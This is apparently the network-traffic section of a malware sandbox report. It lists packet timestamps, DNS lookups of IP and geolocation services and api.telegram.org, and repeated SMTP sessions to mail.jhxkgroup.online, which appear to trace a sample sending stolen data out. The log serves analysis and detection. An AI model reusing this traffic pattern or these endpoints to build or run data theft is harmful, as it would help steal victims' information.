                                                            Sep 26, 2024 13:44:23.107503891 CEST44349725188.114.96.3192.168.2.7
                                                            Sep 26, 2024 13:44:23.107584953 CEST44349725188.114.96.3192.168.2.7
                                                            Sep 26, 2024 13:44:23.107749939 CEST49725443192.168.2.7188.114.96.3
                                                            Sep 26, 2024 13:44:23.108112097 CEST49725443192.168.2.7188.114.96.3
                                                            Sep 26, 2024 13:44:23.121315956 CEST4972480192.168.2.7132.226.8.169
                                                            Sep 26, 2024 13:44:23.126427889 CEST8049724132.226.8.169192.168.2.7
                                                            Sep 26, 2024 13:44:23.126498938 CEST4972480192.168.2.7132.226.8.169
                                                            Sep 26, 2024 13:44:23.129288912 CEST49726443192.168.2.7149.154.167.220
                                                            Sep 26, 2024 13:44:23.129333019 CEST44349726149.154.167.220192.168.2.7
                                                            Sep 26, 2024 13:44:23.129404068 CEST49726443192.168.2.7149.154.167.220
                                                            Sep 26, 2024 13:44:23.129839897 CEST49726443192.168.2.7149.154.167.220
                                                            Sep 26, 2024 13:44:23.129858017 CEST44349726149.154.167.220192.168.2.7
                                                            Sep 26, 2024 13:44:23.810281992 CEST44349726149.154.167.220192.168.2.7
                                                            Sep 26, 2024 13:44:23.810357094 CEST49726443192.168.2.7149.154.167.220
                                                            Sep 26, 2024 13:44:23.813319921 CEST49726443192.168.2.7149.154.167.220
                                                            Sep 26, 2024 13:44:23.813344955 CEST44349726149.154.167.220192.168.2.7
                                                            Sep 26, 2024 13:44:23.813651085 CEST44349726149.154.167.220192.168.2.7
                                                            Sep 26, 2024 13:44:23.815084934 CEST49726443192.168.2.7149.154.167.220
                                                            Sep 26, 2024 13:44:23.859409094 CEST44349726149.154.167.220192.168.2.7
                                                            Sep 26, 2024 13:44:24.059309006 CEST44349726149.154.167.220192.168.2.7
                                                            Sep 26, 2024 13:44:24.059545994 CEST44349726149.154.167.220192.168.2.7
                                                            Sep 26, 2024 13:44:24.059627056 CEST49726443192.168.2.7149.154.167.220
                                                            Sep 26, 2024 13:44:24.063986063 CEST49726443192.168.2.7149.154.167.220
                                                            Sep 26, 2024 13:44:29.543664932 CEST49727587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:44:29.544563055 CEST4970780192.168.2.7132.226.8.169
                                                            Sep 26, 2024 13:44:29.548607111 CEST58749727217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:44:29.548703909 CEST49727587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:44:30.181189060 CEST58749727217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:44:30.181605101 CEST49727587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:44:30.186610937 CEST58749727217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:44:30.353322983 CEST58749727217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:44:30.353725910 CEST49727587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:44:30.358598948 CEST58749727217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:44:30.526225090 CEST58749727217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:44:30.526865959 CEST49727587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:44:30.533238888 CEST58749727217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:44:30.705852985 CEST58749727217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:44:30.705883026 CEST58749727217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:44:30.705902100 CEST58749727217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:44:30.705919027 CEST58749727217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:44:30.705951929 CEST49727587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:44:30.705995083 CEST49727587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:44:30.792663097 CEST58749727217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:44:30.797406912 CEST49727587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:44:30.802306890 CEST58749727217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:44:30.968852997 CEST58749727217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:44:30.971892118 CEST49727587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:44:30.976775885 CEST58749727217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:44:31.143501043 CEST58749727217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:44:31.144717932 CEST49727587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:44:31.150314093 CEST58749727217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:44:31.317140102 CEST58749727217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:44:31.317440987 CEST49727587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:44:31.322257042 CEST58749727217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:44:31.489027023 CEST58749727217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:44:31.489343882 CEST49727587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:44:31.495212078 CEST58749727217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:44:31.662028074 CEST58749727217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:44:31.662286997 CEST49727587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:44:31.668031931 CEST58749727217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:44:31.894382000 CEST58749727217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:44:31.934582949 CEST49727587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:44:32.080712080 CEST49727587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:44:32.085979939 CEST58749727217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:44:32.086056948 CEST49727587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:44:41.392390013 CEST49728587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:44:41.397463083 CEST58749728217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:44:41.397620916 CEST49728587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:44:42.027044058 CEST58749728217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:44:42.027209997 CEST49728587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:44:42.032068014 CEST58749728217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:44:42.462924004 CEST58749728217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:44:42.463134050 CEST58749728217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:44:42.463264942 CEST49728587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:44:42.463447094 CEST49728587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:44:42.468295097 CEST58749728217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:44:42.641243935 CEST58749728217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:44:42.648276091 CEST49728587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:44:42.653295994 CEST58749728217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:44:42.835922956 CEST58749728217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:44:42.835951090 CEST58749728217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:44:42.835964918 CEST58749728217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:44:42.835978031 CEST58749728217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:44:42.836055994 CEST49728587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:44:42.836103916 CEST49728587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:44:42.922559977 CEST58749728217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:44:42.924369097 CEST49728587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:44:42.929181099 CEST58749728217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:44:43.095690966 CEST58749728217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:44:43.097968102 CEST49728587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:44:43.102823019 CEST58749728217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:44:43.273598909 CEST58749728217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:44:43.273879051 CEST49728587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:44:43.278670073 CEST58749728217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:44:43.456353903 CEST58749728217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:44:43.456685066 CEST49728587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:44:43.462398052 CEST58749728217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:44:43.665198088 CEST58749728217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:44:43.665407896 CEST49728587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:44:43.671066999 CEST58749728217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:44:43.879129887 CEST58749728217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:44:43.879439116 CEST49728587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:44:43.884208918 CEST58749728217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:44:44.127374887 CEST58749728217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:44:44.128088951 CEST49728587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:44:44.134757996 CEST58749728217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:44:44.134829998 CEST49728587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:45:03.674022913 CEST49730587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:45:03.679157972 CEST58749730217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:45:03.679256916 CEST49730587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:45:04.337904930 CEST58749730217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:45:04.338134050 CEST49730587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:45:04.343031883 CEST58749730217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:45:04.515001059 CEST58749730217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:45:04.515197039 CEST49730587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:45:04.519963980 CEST58749730217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:45:04.696432114 CEST58749730217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:45:04.697072983 CEST49730587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:45:04.706988096 CEST58749730217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:45:04.886430025 CEST58749730217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:45:04.886445999 CEST58749730217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:45:04.886456013 CEST58749730217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:45:04.886563063 CEST49730587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:45:04.886636019 CEST58749730217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:45:04.886682034 CEST49730587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:45:04.973830938 CEST58749730217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:45:04.975613117 CEST49730587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:45:04.981616020 CEST58749730217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:45:05.402724981 CEST58749730217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:45:05.403846025 CEST58749730217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:45:05.403937101 CEST49730587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:45:05.404829979 CEST49730587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:45:05.413558006 CEST58749730217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:45:05.585767031 CEST58749730217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:45:05.586060047 CEST49730587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:45:05.591402054 CEST58749730217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:45:05.763753891 CEST58749730217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:45:05.764142990 CEST49730587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:45:05.770163059 CEST58749730217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:45:05.942209959 CEST58749730217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:45:05.942455053 CEST49730587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:45:05.947343111 CEST58749730217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:45:06.119414091 CEST58749730217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:45:06.119868994 CEST49730587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:45:06.124696016 CEST58749730217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:45:06.354474068 CEST58749730217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:45:06.355129004 CEST49730587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:45:06.360641003 CEST58749730217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:45:06.360779047 CEST49730587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:45:42.433129072 CEST49731587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:45:42.438313007 CEST58749731217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:45:42.438407898 CEST49731587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:45:42.558782101 CEST49731587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:45:42.563781977 CEST58749731217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:45:42.563838005 CEST49731587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:45:42.794433117 CEST49732587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:45:42.800458908 CEST58749732217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:45:42.800546885 CEST49732587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:45:43.437735081 CEST58749732217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:45:43.437992096 CEST49732587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:45:43.443150043 CEST58749732217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:45:43.609600067 CEST58749732217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:45:43.612732887 CEST49732587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:45:43.618941069 CEST58749732217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:45:43.786331892 CEST58749732217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:45:43.786959887 CEST49732587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:45:43.791944981 CEST58749732217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:45:43.965620041 CEST58749732217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:45:43.965683937 CEST58749732217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:45:43.965717077 CEST58749732217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:45:43.965755939 CEST58749732217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:45:43.965876102 CEST49732587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:45:43.965876102 CEST49732587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:45:44.130882025 CEST58749732217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:45:44.184853077 CEST49732587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:45:44.200249910 CEST49732587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:45:44.205254078 CEST58749732217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:45:44.371678114 CEST58749732217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:45:44.380517006 CEST49732587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:45:44.385310888 CEST58749732217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:45:44.551915884 CEST58749732217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:45:44.552187920 CEST49732587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:45:44.556955099 CEST58749732217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:45:44.723692894 CEST58749732217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:45:44.723993063 CEST49732587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:45:44.728898048 CEST58749732217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:45:44.895466089 CEST58749732217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:45:44.895690918 CEST49732587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:45:44.900480032 CEST58749732217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:45:45.067394972 CEST58749732217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:45:45.067625046 CEST49732587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:45:45.072710991 CEST58749732217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:45:45.279328108 CEST58749732217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:45:45.279947042 CEST49732587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:45:45.286115885 CEST58749732217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:45:45.286181927 CEST49732587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:46:08.109159946 CEST49733587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:46:08.114428043 CEST58749733217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:46:08.114540100 CEST49733587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:46:08.763739109 CEST58749733217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:46:08.763890028 CEST49733587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:46:08.768773079 CEST58749733217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:46:08.935470104 CEST58749733217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:46:08.935610056 CEST49733587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:46:08.940385103 CEST58749733217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:46:09.107906103 CEST58749733217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:46:09.110846043 CEST49733587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:46:09.115731001 CEST58749733217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:46:09.171200037 CEST49733587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:46:09.176333904 CEST58749733217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:46:09.176392078 CEST49733587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:46:35.729315996 CEST49734587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:46:35.734395981 CEST58749734217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:46:35.734500885 CEST49734587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:46:36.373044014 CEST58749734217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:46:36.373198986 CEST49734587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:46:36.378129959 CEST58749734217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:46:36.528892994 CEST49734587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:46:36.534250021 CEST58749734217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:46:36.535507917 CEST49734587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:47:01.439363956 CEST49735587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:47:01.444323063 CEST58749735217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:47:01.444605112 CEST49735587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:47:02.071041107 CEST58749735217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:47:02.071749926 CEST49735587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:47:02.076576948 CEST58749735217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:47:02.243545055 CEST58749735217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:47:02.243671894 CEST49735587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:47:02.248481035 CEST58749735217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:47:02.280471087 CEST49735587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:47:02.285559893 CEST58749735217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:47:02.286652088 CEST49735587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:47:27.703360081 CEST49736587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:47:27.708403111 CEST58749736217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:47:27.708621025 CEST49736587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:47:27.932591915 CEST49736587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:47:27.937552929 CEST58749736217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:47:27.937622070 CEST49736587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:47:39.462132931 CEST49737587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:47:39.467037916 CEST58749737217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:47:39.467117071 CEST49737587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:47:39.541919947 CEST49737587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:47:39.546870947 CEST58749737217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:47:39.546928883 CEST49737587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:47:43.005520105 CEST49738587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:47:43.010552883 CEST58749738217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:47:43.010725021 CEST49738587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:47:43.573765039 CEST58749738217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:47:43.574301958 CEST49738587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:47:43.579121113 CEST58749738217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:47:43.745894909 CEST58749738217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:47:43.746234894 CEST49738587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:47:43.751029015 CEST58749738217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:47:43.794843912 CEST49738587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:47:43.800013065 CEST58749738217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:47:43.800337076 CEST49738587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:47:54.918637991 CEST49739587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:47:54.923682928 CEST58749739217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:47:54.923783064 CEST49739587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:47:55.490883112 CEST58749739217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:47:55.491156101 CEST49739587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:47:55.496195078 CEST58749739217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:47:55.944158077 CEST58749739217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:47:55.944339991 CEST49739587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:47:55.944634914 CEST58749739217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:47:55.944695950 CEST49739587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:47:55.949249983 CEST58749739217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:47:56.117739916 CEST58749739217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:47:56.118177891 CEST49739587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:47:56.123083115 CEST58749739217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:47:56.298532963 CEST58749739217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:47:56.298583031 CEST58749739217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:47:56.298619986 CEST58749739217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:47:56.298655033 CEST58749739217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:47:56.298697948 CEST49739587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:47:56.298778057 CEST49739587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:47:56.385951996 CEST58749739217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:47:56.387582064 CEST49739587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:47:56.392508984 CEST58749739217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:47:56.858258009 CEST58749739217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:47:56.858572006 CEST58749739217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:47:56.858655930 CEST49739587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:47:57.669415951 CEST49739587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:47:57.674406052 CEST58749739217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:47:57.842025042 CEST58749739217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:47:57.842366934 CEST49739587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:47:57.847268105 CEST58749739217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:47:58.016581059 CEST58749739217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:47:58.016839027 CEST49739587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:47:58.021780968 CEST58749739217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:47:58.191752911 CEST58749739217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:47:58.192056894 CEST49739587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:47:58.196989059 CEST58749739217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:47:58.364747047 CEST58749739217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:47:58.364938021 CEST49739587192.168.2.7217.12.218.219
                                                            Sep 26, 2024 13:47:58.369812012 CEST58749739217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:47:58.858369112 CEST58749739217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:47:58.858958960 CEST58749739217.12.218.219192.168.2.7
                                                            Sep 26, 2024 13:47:58.862848043 CEST49739587192.168.2.7217.12.218.219
                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Sep 26, 2024 13:44:04.809223890 CEST5969153192.168.2.71.1.1.1
                                                            Sep 26, 2024 13:44:04.816618919 CEST53596911.1.1.1192.168.2.7
                                                            Sep 26, 2024 13:44:08.568409920 CEST6076653192.168.2.71.1.1.1
                                                            Sep 26, 2024 13:44:08.575551033 CEST53607661.1.1.1192.168.2.7
                                                            Sep 26, 2024 13:44:23.121887922 CEST6458053192.168.2.71.1.1.1
                                                            Sep 26, 2024 13:44:23.128668070 CEST53645801.1.1.1192.168.2.7
                                                            Sep 26, 2024 13:44:29.404820919 CEST6191253192.168.2.71.1.1.1
                                                            Sep 26, 2024 13:44:29.537338972 CEST53619121.1.1.1192.168.2.7
                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                            Sep 26, 2024 13:44:04.809223890 CEST192.168.2.71.1.1.10xbcd3Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                            Sep 26, 2024 13:44:08.568409920 CEST192.168.2.71.1.1.10x1c51Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                            Sep 26, 2024 13:44:23.121887922 CEST192.168.2.71.1.1.10x2187Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                            Sep 26, 2024 13:44:29.404820919 CEST192.168.2.71.1.1.10x56a0Standard query (0)mail.jhxkgroup.onlineA (IP address)IN (0x0001)false
                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            Sep 26, 2024 13:44:04.816618919 CEST1.1.1.1192.168.2.70xbcd3No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                            Sep 26, 2024 13:44:04.816618919 CEST1.1.1.1192.168.2.70xbcd3No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                            Sep 26, 2024 13:44:04.816618919 CEST1.1.1.1192.168.2.70xbcd3No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                            Sep 26, 2024 13:44:04.816618919 CEST1.1.1.1192.168.2.70xbcd3No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                            Sep 26, 2024 13:44:04.816618919 CEST1.1.1.1192.168.2.70xbcd3No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                            Sep 26, 2024 13:44:04.816618919 CEST1.1.1.1192.168.2.70xbcd3No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                            Sep 26, 2024 13:44:08.575551033 CEST1.1.1.1192.168.2.70x1c51No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                            Sep 26, 2024 13:44:08.575551033 CEST1.1.1.1192.168.2.70x1c51No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
